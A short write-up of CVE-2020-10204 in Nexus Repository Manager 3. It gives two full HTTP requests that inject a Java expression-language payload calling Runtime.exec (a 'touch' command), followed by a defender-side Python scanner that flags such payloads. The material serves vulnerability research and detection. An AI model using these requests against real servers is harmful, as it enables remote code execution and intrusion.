## CVE-2020-10204 Nexus Repository Manager 3 RCE
**Affected versions**:

- <= 3.21.1
- Affected Versions: All previous Nexus Repository Manager 3.x OSS/Pro versions up to and including 3.21.1
- Fixed in Version: Nexus Repository Manager OSS/Pro version 3.21.2

**Prerequisite:** logged in with any account **>> call the role update interface**

1. Via the user update interface:
```http
POST /service/extdirect HTTP/1.1
Host: 127.0.0.1:8081
Content-Length: 301
accept: application/json
Sec-Fetch-Dest: empty
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.149 Safari/537.36
NX-ANTI-CSRF-TOKEN: 0.16936373694860252
Content-Type: application/json
Origin: http://127.0.0.1:8081
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: cors
Referer: http://127.0.0.1:8081/swagger-ui/?_v=3.21.1-01&_e=OSS
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.9
Cookie: jenkins-timestamper-offset=-28800000; Hm_lvt_8346bb07e7843cd10a2ee33017b3d627=1583249520; NX-ANTI-CSRF-TOKEN=0.16936373694860252; NXSESSIONID=4e5437b3-7755-4784-bda6-d004e8f589fb
Connection: close

{"action":"coreui_User","method":"update","data":[{"userId":"www","version":"2","firstName":"www","lastName":"www","email":"www@qq.com","status":"active","roles":["$\\A{''.getClass().forName('java.lang.Runtime').getMethods()[6].invoke(null).exec('touch /tmp/cve-2020-10204')}"]}],"type":"rpc","tid":9}
```
2. Via the role creation interface:
```http
POST /service/extdirect HTTP/1.1
Host: 127.0.0.1:8081
Content-Length: 294
accept: application/json
Sec-Fetch-Dest: empty
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.149 Safari/537.36
NX-ANTI-CSRF-TOKEN: 0.856555763510765
Content-Type: application/json
Origin: http://127.0.0.1:8081
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: cors
Referer: http://127.0.0.1:8081/swagger-ui/?_v=3.21.1-01&_e=OSS
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.9
Cookie: jenkins-timestamper-offset=-28800000; Hm_lvt_8346bb07e7843cd10a2ee33017b3d627=1583249520; NX-ANTI-CSRF-TOKEN=0.856555763510765; NXSESSIONID=da418706-f4e4-468e-93ac-de9c46802f11
Connection: close

{"action":"coreui_Role","method":"create","data":[{"version":"","source":"default","id":"1111","name":"2222","description":"3333","privileges":["$\\A{''.getClass().forName('java.lang.Runtime').getMethods()[6].invoke(null).exec('touch /tmp/cve-2020-10204')}"],"roles":[]}],"type":"rpc","tid":89}
```
> [@threedr3am](https://github.com/threedr3am/learnjavabug/tree/master/nexus/CVE-2020-10204)
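
A defender-side check for the two requests above, as an added example that is not part of the original post or the linked repository: it parses a captured `/service/extdirect` request body and flags expression-language openers in the `roles` and `privileges` lists. The function name, finding format and sample bodies are constructed for illustration, and matching the plain `${` opener goes beyond the `$\\A{` form shown on this page.

```python
import json
import re

# Markers taken from the requests above: an EL opener ("$\A{" after JSON
# decoding; plain "${" is matched too) and reflective access to Java classes.
EL_OPENER = re.compile(r"\$(?:\\.)?\{")
REFLECTION = re.compile(r"getClass\s*\(|forName\s*\(|java\.lang\.")

# Ext.Direct (action, method) pairs shown on this page and the list fields
# that carried the expression.
WATCHED = {
    ("coreui_User", "update"): ("roles",),
    ("coreui_Role", "create"): ("privileges", "roles"),
}

def scan_extdirect_body(body):
    """Return one finding per suspicious value in a POST /service/extdirect body."""
    try:
        calls = json.loads(body)
    except ValueError:
        return [{"action": None, "field": None, "value": None, "reason": "unparseable"}]
    if isinstance(calls, dict):  # a single call; batched calls arrive as a list
        calls = [calls]
    findings = []
    for call in calls if isinstance(calls, list) else []:
        if not isinstance(call, dict):
            continue
        fields = WATCHED.get((call.get("action"), call.get("method")), ())
        records = call.get("data")
        for record in records if isinstance(records, list) else []:
            for field in fields:
                values = record.get(field) if isinstance(record, dict) else None
                for value in values if isinstance(values, list) else []:
                    if isinstance(value, str) and EL_OPENER.search(value):
                        findings.append({
                            "action": call["action"], "field": field, "value": value,
                            "reason": "el+reflection" if REFLECTION.search(value) else "el",
                        })
    return findings

# Constructed sample bodies with harmless expressions (not captured traffic).
SAMPLES = [
    r'{"action":"coreui_User","method":"update","data":[{"userId":"a","roles":["nx-admin"]}],"type":"rpc","tid":1}',
    r'{"action":"coreui_Role","method":"create","data":[{"id":"r","privileges":["$\\A{1+1}"],"roles":[]}],"type":"rpc","tid":2}',
    r'[{"action":"coreui_User","method":"update","data":[{"userId":"a","roles":["$\\A{x.getClass()}"]}],"type":"rpc","tid":3}]',
]
```

Legitimate role and privilege identifiers never contain `${` or `$\X{`, so any finding on these two calls is worth alerting on, whether or not the instance is already on 3.21.2.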